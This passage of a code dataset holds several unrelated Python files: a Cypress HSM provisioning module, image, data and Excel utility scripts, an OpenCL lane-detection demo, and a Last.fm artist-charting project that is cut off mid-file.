Crypto.jwt_payload(cy_auth)\n cy_pub_key = cy_auth_payload[\"cy_pub_key\"]\n hsm_pub_key = cy_auth_payload[\"hsm_pub_key\"]\n if not Crypto.validate_jwt(cy_auth, cy_pub_key):\n raise Exception(\"Invalid signature on Cypress HSM authorization in request\")\n if cy_auth_payload[\"type\"] != Types.CY_AUTH_HSM:\n raise Exception(\"Invalid type for Cypress HSM authorization in request\")\n if datetime.fromtimestamp(cy_auth_payload[\"exp\"]) < datetime.now():\n raise Exception(\"Cypress HSM authorization expired\")\n\n # validate HSM request itself\n signing_pub_key = signing_pkg_payload[\"signing_pub_key\"]\n prod_id = signing_pkg_payload[\"prod_id\"]\n if not Crypto.validate_jwt(signing_pkg, hsm_pub_key):\n raise Exception(\"Invalid signature on HSM signing key package\")\n if signing_pkg_payload[\"type\"] != Types.HSM_SIGNING_KEY_PKG:\n raise Exception(\"Invalid type on HSM signing key package\")\n if datetime.fromtimestamp(signing_pkg_payload[\"exp\"]) < datetime.now():\n raise Exception(\"HSM signing key package expired\")\n \n # create the RoT transfer authorization (that will go to the device)\n payload = {}\n payload[\"type\"] = Types.OEM_ROT_AUTH\n payload[\"oem_pub_key\"] = oem_pub_key\n payload[\"hsm_pub_key\"] = hsm_pub_key\n payload[\"prod_id\"] = prod_id\n payload[\"iat\"] = int(datetime.now().timestamp())\n rot_auth = Crypto.create_jwt(payload, oem_priv_key)\n\n # create the chain of trust\n cert = Crypto.create_x509_cert(signing_pub_key, oem_priv_key, prod_id)\n chain_of_trust = oem_chain_of_trust + [cert]\n\n # create the response\n exp = datetime.now() + timedelta(7)\n payload = {}\n payload[\"type\"] = Types.OEM_ROT_AUTH_PKG\n payload[\"iat\"] = int(datetime.now().timestamp())\n payload[\"exp\"] = int(exp.timestamp())\n payload[\"prod_id\"] = prod_id\n payload[\"rot_auth\"] = rot_auth\n payload[\"chain_of_trust\"] = chain_of_trust\n rot_auth_pkg = Crypto.create_jwt(payload, oem_priv_key)\n \n # create audit record\n signing_pkg_readable = Crypto.readable_jwt(signing_pkg)\n signing_pkg_readable[\"payload\"][\"cy_auth\"] = Crypto.readable_jwt(signing_pkg_readable[\"payload\"][\"cy_auth\"])\n signing_pkg_readable[\"payload\"][\"disti_auth\"] = Crypto.readable_jwt(signing_pkg_readable[\"payload\"][\"disti_auth\"])\n rot_auth_pkg_readable = Crypto.readable_jwt(rot_auth_pkg)\n rot_auth_pkg_readable[\"payload\"][\"rot_auth\"] = Crypto.readable_jwt(rot_auth_pkg_readable[\"payload\"][\"rot_auth\"])\n record = {}\n record[\"type\"] = Types.OEM_ROT_AUTH_PKG\n record[\"iat\"] = datetime.now().isoformat(' ')\n record[\"signing_pkg\"] = signing_pkg_readable\n record[\"rot_auth_pkg\"] = rot_auth_pkg_readable\n self.append_audit_record(record)\n \n return rot_auth_pkg\n\n def create_provision_request(self, blob):\n \"\"\"\n The OEM can create a request for provisioning by signing a keys & policies blob with its private key\n Note that blob must contain at least the prod_id field\n \"\"\"\n # create the request\n oem_priv_key = self.state[\"oem_priv_key\"]\n prov_req = Crypto.create_jwt(blob, oem_priv_key)\n \n # create audit record\n record = {}\n record[\"type\"] = Types.OEM_PROV_REQ\n record[\"iat\"] = datetime.now().isoformat(' ')\n record[\"prod_id\"] = blob[\"prod_id\"]\n record[\"prov_req\"] = Crypto.readable_jwt(prov_req)\n self.append_audit_record(record)\n \n return prov_req\n \n def pack_rot_auth( self, prod_id, hsm_pub_key):\n oem_pub_key = self.state[\"oem_pub_key\"]\n oem_priv_key = self.state[\"oem_priv_key\"]\n \n payload= {}\n payload[\"type\"] = Types.OEM_ROT_AUTH\n payload[\"oem_pub_key\"] = oem_pub_key\n payload[\"hsm_pub_key\"] = hsm_pub_key\n payload[\"prod_id\"] = prod_id\n payload[\"iat\"] = int(datetime.now().timestamp())\n rot_auth = Crypto.create_jwt(payload, oem_priv_key)\n \n return rot_auth\n","sub_path":"cysecuretools/execute/provisioning_lib/cyprov_oem.py","file_name":"cyprov_oem.py","file_ext":"py","file_size_in_byte":6422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"610633763","text":"import re\n\nfrom pathlib import Path\n\nimport numpy as np\n\nimport click\n\nfrom imageio import imread, imsave\n\n\ndef grouper(n, iterable):\n args = [iter(iterable)] * n\n return map(list, zip(*args))\n\ndef sorted_nicely(l):\n \"\"\"Return list sorted in the way that humans expect.\n\n :param l: iterable to be sorted\n :returns: sorted list\n \"\"\"\n convert = lambda text: int(text) if text.isdigit() else text\n sort_key = lambda key: [convert(c) for c in re.split('([0-9]+)', key)]\n return sorted(l, key=sort_key)\n\ndef join_tiles_in_path(path, output_fpath='joined.png'):\n\n files = sorted_nicely([str(f) for f in path.iterdir() if f.is_file()])\n\n n_rows = 1 + max([int(fn.split('-')[3]) for fn in files])\n\n images = [imread(f) for f in files]\n\n joined = np.block(list(grouper(n_rows, images)))\n\n print(joined.shape)\n\n imsave(output_fpath, joined)\n\n\n@click.command()\n@click.argument('tile_dir')\ndef main(tile_dir):\n\n tile_dir = Path(tile_dir)\n\n join_tiles_in_path(tile_dir)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"scripts/join_output_tiles.py","file_name":"join_output_tiles.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"142938287","text":"import os\nos.environ['TF_CPP_MIN_LOG_LEVEL']='2'\nimport tensorflow as tf\n# a=tf.constant([3.0,5.0])\n# b=tf.constant([8.0,10.0])\n# result=a+b\n# sess=tf.Session()\n# variable=tf.constant(tf.zeros([2,3]))\n# print(a.graph is tf.compat.v1.get_default_graph())\n# with tf.compat.v1.Session as sess:\n# print(sess.run(a))\n # print(result)\n\nw1=tf.Variable(tf.compat.v1.random.normal((2,3),stddev=1,seed=1))\nw2=tf.Variable(tf.compat.v1.random.normal((3,1),stddev=1,seed=1))\n\nx=tf.compat.v1.placeholder(tf.float32,shape=(2,2),name='input_data')\na=tf.matmul(x,w1)\ny=tf.matmul(a,w2)\niniter=tf.compat.v1.global_variables_initializer()\nwith tf.compat.v1.Session() as sess:\n sess.run(initer)\n # sess.run(w2.initializer)\n print(sess.run(y,feed_dict={x:[[0.7,0.99],[0.8,0.5]]}))\n","sub_path":"大论文代码/第四章/tensorflow学习代码/sample01.py","file_name":"sample01.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"564275085","text":"import numpy as np\nfrom numpy import genfromtxt\nimport csv\n# X = genfromtxt('features_face_AB.csv', delimiter=',')\n\nf = open('train_ranks_SVM.txt', 'r')\nb = f.read()\nX = eval(b)\n\nlabel_file = 'labels.txt'\nf2 = open(label_file,'r')\nl = f2.read().split('\\n')\n\nfreq = []\nfor i in range(1,9):\n freq.append(l.count(str(i)))\n\nX_tr = []\nX_ts = []\n\nindex = 0\nfor p in freq:\n i = index\n j = index + 85\n k = index + p\n\n X_tr.extend(X[i:j])\n X_ts.extend(X[j:k])\n\nX_tr.extend(X_ts)\n\nprint (len(X_tr))\n","sub_path":"reordering.py","file_name":"reordering.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"577789769","text":"from openpyxl.utils import get_column_letter as gcl\nfrom importDict import number_from_column\nimport openpyxl\nimport os\nimport pygame\nimport sys\nimport time\n\n# GETS ALL COLUMNS FROM THIS ROW\n# print(sheet[1])\n\ndef addType():\n # Uses sys.argv to pass in arguments\n args = sys.argv[1:]\n fileName = args[0]\n string = args[1]\n cols = args[2:]\n\n # Open an existing excel file\n wb = openpyxl.load_workbook(fileName)\n sheet = wb.worksheets[0]\n\n #################\n # DO STUFF HERE #\n #################\n first = 2\n last = sheet.max_row + 1\n changes = 0\n for col in cols:\n for row in range (first, last):\n if sheet[col + str(row)].value:\n changes = changes + 1\n sheet[gcl(number_from_column(col) + 1) + str(row)].value = string\n print(col + str(row) + \":\", sheet[col + str(row)].value, '->', string)\n\n print(\"Processed \" + str((last - first) * len(cols)) + \" rows...\")\n print(\"Changed \" + str(changes) + \" values...\")\n\n # add the word 'formatted' and save the new file where the original is\n newName = string\n index = fileName[::-1].find('/')\n end = fileName[-index - 1:]\n fileName = fileName[:-index - 1] + newName + end[0].capitalize() + end[1:]\n print(\"Saving \" + fileName)\n wb.save(fileName)\n\n # LMK when the script is done\n pygame.init()\n pygame.mixer.music.load('/home/andrefisch/python/evan/note.mp3')\n pygame.mixer.music.play()\n time.sleep(5)\n pygame.mixer.music.stop()\n\naddType()\n","sub_path":"addType.py","file_name":"addType.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"353164552","text":"from heapq import *\nfrom collections import Counter\n\nclass Solution:\n def topKFrequent(self, nums: List[int], k: int) -> List[int]:\n num_freq_map = Counter(nums)\n min_heap = []\n\n for num, freq in num_freq_map.items():\n heappush(min_heap, (freq, num))\n if len(min_heap) > k:\n heappop(min_heap)\n \n top_nums = []\n while min_heap:\n top_nums.append(heappop(min_heap)[1])\n \n return top_nums","sub_path":"leetcode/top-interview-questions/02_medium_collection/05_sorting_and_searching/02_top_k_frequent_elements.py","file_name":"02_top_k_frequent_elements.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"340922258","text":"import cv2\nimport pyopencl as cl\nimport numpy as np\nimport math\n\ndef setup():\n try:\n plaforms = cl.get_platforms()\n global plaform\n plaform = plaforms[0]\n\n devices = plaform.get_devices()\n global device\n device = devices[0]\n\n global ctx\n ctx = cl.Context(devices)\n\n global commQ\n commQ = cl.CommandQueue(ctx, device)\n\n file = open(\"prog.cl\", \"r\")\n global prog\n prog = cl.Program(ctx, file.read())\n prog.build()\n return True\n except Exception as e:\n print(e)\n return False\n\ndef region(image):\n polygon = np.array([\n [(200, 142), (50, 400), (170, 400), (280, 250), (495, 250), (580, 400), (710, 400), (540, 142)]\n ])\n\n mask = np.zeros_like(image)\n mask = cv2.fillPoly(mask, polygon, (255, 255, 255))\n mask = cv2.bitwise_and(image, mask)\n return mask\n\ndef lin_equ(l1, l2):\n m = (float)((l2[1] - l1[1]) / (l2[0] - l1[0]))\n c = (l2[1] - (m * l2[0]))\n return m, c\n\nif setup():\n\n # Video Capture\n pathname = \"Images/\"\n car_cascade = cv2.CascadeClassifier(pathname + 'cars3.xml')\n logo_red = cv2.imread(pathname + 'warning.png')\n logo_green = cv2.imread(pathname + 'green.png')\n vidCap = cv2.VideoCapture(\"video1_cut.mp4\")\n\n img_width = np.int32(720)\n img_height = np.int32(540)\n max_rho = np.int32(math.sqrt(math.pow(img_width, 2) + math.pow(img_height, 2)))\n max_theta = np.int32(180)\n votes_matrix = np.zeros((max_rho, max_theta), dtype=np.int32)\n\n costheta_values = np.cos(np.arange(-np.pi / 2, np.pi / 2, np.pi / 180), dtype=np.float32)\n sentheta_values = np.sin(np.arange(-np.pi / 2, np.pi / 2, np.pi / 180), dtype=np.float32)\n\n max_values_rho = np.zeros((2, 1), dtype=np.int32)\n max_values_theta = np.zeros((2, 1), dtype=np.int32)\n max_votes = np.zeros((2, 1), dtype=np.int32)\n threshold = np.int32(175)\n\n if not vidCap.isOpened():\n print(\"Video File Not Found\")\n exit(-1)\n\n while True:\n\n ret, vidFrame = vidCap.read()\n if not ret:\n break\n vidFrame = cv2.resize(vidFrame, (720, 540))\n crop_img = region(vidFrame)\n\n crop_img_gray = cv2.cvtColor(vidFrame, cv2.COLOR_BGR2GRAY)\n ############################# Binarization ######################################\n crop_img_gray = cv2.adaptiveThreshold(crop_img_gray, 255, cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, 201,\n -30)\n imgIn_new = region(crop_img_gray)\n imgIn_new = cv2.cvtColor(imgIn_new, cv2.COLOR_BGR2BGRA)\n imgOut = np.copy(imgIn_new)\n\n img_width = np.int32(imgIn_new.shape[1])\n img_height = np.int32(imgIn_new.shape[0])\n\n ########################################### Hough Transform ###########################################################\n kernelName = prog.hough_tf\n imgFormat = cl.ImageFormat(cl.channel_order.BGRA, cl.channel_type.UNSIGNED_INT8)\n imgInBuffer = cl.Image(ctx, flags=cl.mem_flags.COPY_HOST_PTR | cl.mem_flags.READ_ONLY,\n format=imgFormat,\n shape=(img_width, img_height),\n pitches=(imgIn_new.strides[0], imgIn_new.strides[1]),\n hostbuf=imgIn_new.data)\n\n costhetaBuffer = cl.Buffer(ctx, flags=cl.mem_flags.COPY_HOST_PTR | cl.mem_flags.READ_ONLY,\n hostbuf=costheta_values)\n\n senthetaBuffer = cl.Buffer(ctx, flags=cl.mem_flags.COPY_HOST_PTR | cl.mem_flags.READ_ONLY,\n hostbuf=sentheta_values)\n\n votesBuffer = cl.Buffer(ctx, flags=cl.mem_flags.COPY_HOST_PTR | cl.mem_flags.READ_WRITE,\n hostbuf=votes_matrix)\n\n kernelName.set_arg(0, imgInBuffer)\n kernelName.set_arg(1, votesBuffer)\n kernelName.set_arg(2, costhetaBuffer)\n kernelName.set_arg(3, senthetaBuffer)\n kernelName.set_arg(4, max_rho)\n kernelName.set_arg(5, max_theta)\n kernelName.set_arg(6, img_width) # Width\n kernelName.set_arg(7, img_height) # Height\n\n workGroupSize = (\n math.ceil(np.int32(imgOut.shape[1]) / 32) * 32, math.ceil(np.int32(imgOut.shape[0]) / 32) * 32)\n workItemSize = (32, 32) # 1024\n\n kernelEvent = cl.enqueue_nd_range_kernel(commQ, kernelName, global_work_size=workGroupSize,\n local_work_size=workItemSize)\n kernelEvent.wait()\n\n ######################################## Select Max ######################################################################\n # Select max rho and theta\n kernelName = prog.select_max_matrix\n\n max_rho_buff = cl.Buffer(ctx, flags=cl.mem_flags.COPY_HOST_PTR | cl.mem_flags.READ_WRITE,\n hostbuf=max_values_rho)\n\n max_theta_buff = cl.Buffer(ctx, flags=cl.mem_flags.COPY_HOST_PTR | cl.mem_flags.READ_WRITE,\n hostbuf=max_values_theta)\n max_votes_buff = cl.Buffer(ctx, flags=cl.mem_flags.COPY_HOST_PTR | cl.mem_flags.READ_WRITE,\n hostbuf=max_votes)\n\n kernelName.set_arg(0, votesBuffer)\n kernelName.set_arg(1, max_rho)\n kernelName.set_arg(2, max_theta)\n kernelName.set_arg(3, max_rho_buff)\n kernelName.set_arg(4, max_theta_buff)\n kernelName.set_arg(5, max_votes_buff)\n\n workGroupSize = (1, 1)\n workItemSize = (1, 1)\n\n kernelEvent = cl.enqueue_nd_range_kernel(commQ, kernelName, global_work_size=workGroupSize,\n local_work_size=workItemSize)\n kernelEvent.wait()\n\n cl.enqueue_copy(commQ, max_values_rho, max_rho_buff)\n cl.enqueue_copy(commQ, max_values_theta, max_theta_buff)\n a = math.cos(math.radians(max_values_theta[0]))\n b = math.sin(math.radians(max_values_theta[0]))\n x0 = a * max_values_rho[0]\n y0 = b * max_values_rho[0]\n pt1 = (int(x0 + 1000 * (-b)), int(y0 + 1000 * (a)))\n pt2 = (int(x0 - 1000 * (-b)), int(y0 - 1000 * (a)))\n m_blue, b_blue = lin_equ(pt1, pt2)\n if m_blue != 0:\n cv2.line(vidFrame, pt1, (int((70 - b_blue) / m_blue), 70), (255, 0, 0), 2, cv2.LINE_AA)\n else:\n cv2.line(vidFrame, pt1, pt2, (255, 0, 0), 2, cv2.LINE_AA)\n\n a = math.cos(math.radians(max_values_theta[1]))\n b = math.sin(math.radians(max_values_theta[1]))\n x0 = a * max_values_rho[1]\n y0 = b * max_values_rho[1]\n pt3 = (int(x0 + 1000 * (-b)), int(y0 + 1000 * (a)))\n pt4 = (int(x0 - 1000 * (-b)), int(y0 - 1000 * (a)))\n m_red, b_red = lin_equ(pt3, pt4)\n if m_red != 0:\n cv2.line(vidFrame, (int((420 - b_red) / m_red), 420), (int((70 - b_red) / m_red), 70), (0, 0, 255), 2,\n cv2.LINE_AA)\n else:\n cv2.line(vidFrame, pt3, pt4, (255, 0, 0), 2, cv2.LINE_AA)\n\n crop_img_car = vidFrame[0:410, 50:50 + 500] # ROI\n imgGray = cv2.cvtColor(crop_img_car, cv2.COLOR_BGR2GRAY)\n vidFrame[30:30 + 100, 30:30 + 100] = logo_green\n cars = car_cascade.detectMultiScale(imgGray, 1.4, 3)\n for (x, y, w, h) in cars:\n if (y + h) >= 90:\n cX = int((x + x + w) / 2.0)\n cY = int((y + y + h) / 2.0)\n if (cY) + m_red * (cX) + b_red > 0 and (cY) + m_blue * (cX) + b_blue > 0:\n vidFrame[30:30+100, 30:30+100] = logo_red\n cv2.rectangle(crop_img_car, (x, y), (x + w, y + h), (0, 0, 255), 2)\n else:\n cv2.rectangle(crop_img_car, (x, y), (x + w, y + h), (0, 255, 0), 2)\n\n imgInBuffer.release()\n votesBuffer.release()\n max_rho_buff.release()\n max_theta_buff.release()\n\n cv2.imshow('Car and Lane detection', vidFrame)\n if cv2.waitKey(10) & 0xFF == ord('q'): # 'q' key to close window\n break\n\n vidCap.release()\n cv2.destroyAllWindows()","sub_path":"Optimization.py","file_name":"Optimization.py","file_ext":"py","file_size_in_byte":8122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"401374652","text":"import torch\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport torchvision\nfrom torchvision import models\n\nfrom train_set import MiniPlacesDataset\nfrom fine_tuning_config_file import *\n\nimport sys\n\nimport os\n\n# Outputs a file containing top5 outputs and actual label.\n# Used to analyze our network and collect data for the\n# write-up.\n\ndef compute_metrics(model, use_gpu, output_path, test_options):\n print(output_path)\n mode = output_path.split('/')[-1]\n mode = mode.split('_')[0]\n data_dir = os.path.expanduser(DATA_PATH)\n test_options['labels_path'] = os.path.join(data_dir, mode + '.txt')\n print(test_options)\n\n testloader = MiniPlacesDataset(\n photos_path = test_options['photos_path'],\n labels_path = test_options['labels_path'],\n transform = test_options['transform']\n ) \n data_loader = torch.utils.data.DataLoader(testloader, batch_size=1) \n model.eval()\n output_labels = []\n for data in data_loader: \n inputs, labels = data\n\n inputs = Variable(inputs.float().cuda())\n labels = Variable(labels.long().cuda()) \n \n output = model(inputs)\n probabilities, prediction = output.topk(5, dim=1, largest=True, sorted=True)\n\n prediction = [str(elt) for elt in prediction.data[0]]\n prediction += [str(prb) for prb in probabilities.data[0]]\n prediction.append(str(labels.data[0]))\n prediction = \" \".join(prediction)\n print(prediction)\n output_labels.append(prediction)\n \n output_labels = \"\\n\".join(output_labels)\n with open(output_path, 'w') as outfile:\n outfile.write(output_labels)\n","sub_path":"Resnet Code/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"544515843","text":"import argparse,math,numpy,os,sys,tables\nimport time\n\ndef write_hdf5( inputfiles, motif_file_name, idx=1 ):\n \"\"\" Save all motif data in current directory into hdf5 file.\"\"\" \n\n h5file = tables.open_file( motif_file_name, \"a\", driver=\"H5FD_CORE\")\n\n for inputfile in inputfiles:\n fname = os.path.split(inputfile)[1]\n name = fname.split('.')[0]\n ext = fname.split('.')[1]\n if ext != 'txt':\n pass \n l = []\n name = name.replace('::','_')\n try:\n a = h5file.get_node(\"/\", name )\n except:\n fp = open(inputfile)\n for i,line in enumerate(fp.readlines()):\n f = line.split()\n l += [float(f[idx])]\n A = numpy.array(l)\n h5a = h5file.create_array( h5file.root, name, A )\n h5a.flush()\n\n h5file.close()\n return\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description=\"\"\"Compute motif enrichment from pre-calculated data e.g. DHS peaks.\"\"\")\n parser.add_argument( '-i', dest='colindex', type=int, default=1, required=False, help='Column with values (starting at 0) for generating hdf5 file.' )\n parser.add_argument( '-n', dest='name', required=True, help='The prefix of the output hdf5 file.' )\n parser.add_argument( '-f', dest='files', required=True, nargs=\"+\", help='The files that want to create the hdf5 format file.' )\n \n args = parser.parse_args()\n output = args.name\n print(args.files)\n write_hdf5( args.files, output, idx=args.colindex )\n\n\n","sub_path":"Py3_MARGE/marge/createHDF5.py","file_name":"createHDF5.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"557229491","text":"import argparse\nimport json\nimport numpy as np\n\nDEFAULT_CSV_FILE = \"data/example0.csv\"\nDEFAULT_JS_FILE = \"data.js\"\nNETS_TO_WIRE_NAMES_FILES = \"nets_to_wire_names.csv\"\nVDD = 1.2 # Volts\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"Train a deep controller on Toyworld.\")\n parser.add_argument(\n \"--csv_file\",\n help=\"Path to CSV file.\",\n default=DEFAULT_CSV_FILE)\n parser.add_argument(\n \"--js_file\",\n help=\"Path to .js file.\",\n default=DEFAULT_JS_FILE)\n args = parser.parse_args()\n csv_file = args.csv_file\n js_file = args.js_file\n\n mapping_matrix = get_mapping_matrix(csv_file)\n raw_array = np.genfromtxt(csv_file, delimiter=',', skip_header=1)\n js_string = get_save_str_from_raw_array(raw_array, mapping_matrix)\n save_str(js_file, js_string)\n\ndef get_mapping_matrix(csv_file):\n \"\"\"\n The original array is a bunch of columns. Their position on the actual board\n is not cleanly mapped.\n\n This function returns a matrix M such that:\n\n M[x][y] = column in the original array of the (x, y) position on the board\n \"\"\"\n raw_nets_to_wire_names_data = np.genfromtxt(\n NETS_TO_WIRE_NAMES_FILES,\n delimiter=',',\n skip_header=1,\n dtype=str)\n raw_headers = np.genfromtxt(csv_file, delimiter=',', max_rows=1, dtype=str)\n return get_mapping_matrix_from_raw_data(\n raw_nets_to_wire_names_data,\n raw_headers)\n\ndef get_mapping_matrix_from_raw_data(nets_to_wire, raw_headers):\n xy_to_net = get_xy_to_net_dict(nets_to_wire)\n net_to_colm = get_net_to_colm(raw_headers)\n\n mapping_matrix = np.zeros((8, 8), dtype=int)\n for x in range(8):\n for y in range(8):\n net = xy_to_net[(x, y)]\n mapping_matrix[x, y] = net_to_colm[net]\n\n return mapping_matrix\n\ndef get_xy_to_net_dict(nets_to_wire):\n return dict(((int(x), int(y)), net) for x, y, net in nets_to_wire)\n\ndef get_net_to_colm(raw_headers):\n def clean_header(h):\n net = h.split(' ')[0]\n if net[0] == '/':\n net = net[1:]\n return net\n nets = [clean_header(h) for h in raw_headers]\n return dict((net, i) for i, net in enumerate(nets))\n\ndef get_save_str_from_raw_array(raw_array, mapping_matrix):\n array = threshold_array(raw_array)\n array = rearrange_array(array, mapping_matrix)\n return get_save_string_from_clean_array(array)\n\ndef rearrange_array(array, mapping_matrix):\n \"\"\"Convert 64xn to 8x8xn by using the mapping matrix.\"\"\"\n simulation_length = array.shape[0]\n new_array = np.zeros((simulation_length, 8, 8), dtype=int)\n for y in range(8):\n for x in range(8):\n i = mapping_matrix[x, y]\n new_array[:, y, x] = array[:, i]\n return flip_array_vertically(new_array)\n\ndef flip_array_vertically(array):\n return array[:, ::-1, :]\n\ndef threshold_array(array):\n bool_array = array >= (VDD/2)\n return bool_array.astype(int)\n\ndef get_save_string_from_clean_array(array):\n lst_array = array.tolist()\n json_str = json.dumps(lst_array)\n return \"data = '{0}';\".format(json_str)\n\ndef save_str(fname, string):\n with open(fname, 'w') as f:\n f.write(string)\n print(\"Results saved to '{0}'\".format(fname))\n\nif __name__ == '__main__':\n main()\n","sub_path":"javascript/csv_to_js.py","file_name":"csv_to_js.py","file_ext":"py","file_size_in_byte":3337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"135059967","text":"import secrets\nimport json\nimport requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport sqlite3\nimport plotly.express as px\nimport plotly.graph_objects as go\nimport webbrowser\n\n#Database name and also Json file name for reference\nDBNAME = 'artists.db'\nFINALJSON = 'final.json'\n\n#API keys for Last.fm web API call\nAPI_KEY = secrets.API_KEY\nSHARED_SECRET = secrets.SHARED_SECRET\n\n#caching function\nCACHE_FNAME = 'final.json'\ntry:\n cache_file = open(CACHE_FNAME, 'r')\n cache_contents = cache_file.read()\n CACHE_DICTION = json.loads(cache_contents)\n cache_file.close()\nexcept:\n CACHE_DICTION = {}\n\n#make unique combo for web api call\ndef params_unique_combination(baseurl, params):\n alphabetized_keys = sorted(params.keys())\n res = []\n for k in alphabetized_keys:\n res.append(\"{}-{}\".format(k, params[k]))\n return baseurl + \"_\".join(res)\n\n#make the actual web api request with caching\ndef make_request_using_cache(baseurl, params):\n unique_ident = params_unique_combination(baseurl, params)\n if unique_ident in CACHE_DICTION:\n print('getting cached data...')\n return CACHE_DICTION[unique_ident]\n else:\n resp = requests.get(baseurl, params)\n data = json.loads(resp.text)\n CACHE_DICTION[unique_ident] = data\n dumped_json_cache = json.dumps(CACHE_DICTION, indent = 4)\n fw = open(CACHE_FNAME,'w')\n fw.write(dumped_json_cache)\n fw.close()\n return CACHE_DICTION[unique_ident]\n\n#country class to create instances\nclass Country():\n\n def __init__(self, name):\n self.type = type\n self.name = name\n \n def __str__(self):\n return self.name\n \n#make the web api call for top artists in any country with the proper ISO 3166-1 name\n#this function also adds json information from the api call to the caching file final.json\ndef get_top_country_artists(country):\n baseurl = 'http://ws.audioscrobbler.com/2.0/?'\n params = {}\n params['method'] = 'geo.gettopartists'\n params['country'] = country\n params['api_key'] = API_KEY\n params['format'] = 'json'\n \n first_search = make_request_using_cache(baseurl, params)\n\n#make the empty SQLite table known as Top Artists in the database artists.db\ndef make_artist_table():\n conn = sqlite3.connect(DBNAME)\n cur = conn.cursor()\n statement = \"DROP TABLE IF EXISTS 'Top Artists';\"\n cur.execute(statement)\n \n statement = \"\"\"\n CREATE TABLE 'Top Artists' (\n 'Name' TEXT,\n 'Listeners' INTEGER,\n 'Mbid' TEXT,\n 'Url' TEXT,\n 'Country' TEXT);\n \"\"\"\n cur.execute(statement)\n conn.commit()\n conn.close()\n\n#goes through the cache file final.json and parses through the data for the names of popular artist in that country, number of listeners for the artists, url to artists page, and country that people are searching about\ndef populate_json():\n conn = sqlite3.connect(DBNAME)\n cur = conn.cursor()\n with open(FINALJSON) as file:\n json_file = json.load(file)\n artists = json_file\n artists2 = json_file\n random_string_param = list(artists.keys())\n keys = random_string_param\n for x in keys:\n a1 = artists[x]['topartists']['artist']\n attr = artists[x]['topartists']['@attr']\n origin = attr['country']\n for i in a1:\n insertion = (i['name'], i['listeners'], i['mbid'], i['url'], origin)\n statement = \"INSERT INTO 'Top Artists'\"\n statement += \"VALUES (?,?,?,?,?)\"\n cur.execute(statement, insertion)\n conn.commit()\n conn.close()\n\n#goes through Top Artists table in the artist.db database and queries for the top 10 artists for the select country. The query is then put into a dataframe where plotly can graph the data into a bar graph. The x axis shows the names of the artists, y axis shows the number of listeners each artists has, the hover value shows the country that was searched along with the artists listener number and the color distinguishes the popularity for the artists for that specific country\ndef country_bar_plot(country):\n conn = sqlite3.connect(DBNAME)\n cur = conn.cursor()\n cur.execute(\"SELECT Name, Listeners, Country FROM 'Top Artists' WHERE Country = ? LIMIT 10\", (country,))\n data = cur.fetchall()\n rank = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n str(data)\n df = pd.DataFrame([[ij for ij in i] for i in data])\n df.rename(columns={0: 'Name', 1: 'Listeners', 2: 'Country'}, inplace=True)\n df['Rank'] = rank\n print(df)\n df = df.sort_values(['Listeners'], ascending=[1])\n \n graph_data = df\n fig = px.bar(graph_data, x='Name', y='Listeners',\n hover_data=['Listeners', 'Country'], color='Rank',\n labels={'Listeners':'Number of Followers for Artist'}, height=400)\n fig.show()\n\n#This function takes five country arguments and calls on them all and adds each country's data to the caching file and Top Artist table in artists.db. It then queries the table to put the arguments into a concatenated dataframe. It then finds the top 5 most frequent artist names in the dataframe and creates a pie chart with hover values showing the frequency of the artists between the 5 countries selected\ndef compare_countries(country1, country2, country3, country4, country5):\n conn = sqlite3.connect(DBNAME)\n cur = conn.cursor()\n get_top_country_artists(country1)\n get_top_country_artists(country2)\n get_top_country_artists(country3)\n get_top_country_artists(country4)\n get_top_country_artists(country5)\n \n cur.execute(\"SELECT Name, Listeners, Country FROM 'Top Artists' WHERE Country = ? LIMIT 10\", (country1,))\n data1 = cur.fetchall()\n str(data1)\n cur.execute(\"SELECT Name, Listeners, Country FROM 'Top Artists' WHERE Country = ? LIMIT 10\", (country2,))\n data2 = cur.fetchall()\n str(data2)\n cur.execute(\"SELECT Name, Listeners, Country FROM 'Top Artists' WHERE Country = ? LIMIT 10\", (country3,))\n data3 = cur.fetchall()\n str(data3)\n cur.execute(\"SELECT Name, Listeners, Country FROM 'Top Artists' WHERE Country = ? LIMIT 10\", (country4,))\n data4 = cur.fetchall()\n str(data4)\n cur.execute(\"SELECT Name, Listeners, Country FROM 'Top Artists' WHERE Country = ? LIMIT 10\", (country5,))\n data5 = cur.fetchall()\n str(data5)\n \n df1 = pd.DataFrame([[ij for ij in i] for i in data1])\n df1.rename(columns={0: 'Name', 1: 'Listeners', 2: 'Country'}, inplace=True)\n \n df2 = pd.DataFrame([[ij for ij in i] for i in data2])\n df2.rename(columns={0: 'Name', 1: 'Listeners', 2: 'Country'}, inplace=True)\n \n df3 = pd.DataFrame([[ij for ij in i] for i in data3])\n df3.rename(columns={0: 'Name', 1: 'Listeners', 2: 'Country'}, inplace=True)\n \n df4 = pd.DataFrame([[ij for ij in i] for i in data4])\n df4.rename(columns={0: 'Name', 1: 'Listeners', 2: 'Country'}, inplace=True)\n \n df5 = pd.DataFrame([[ij for 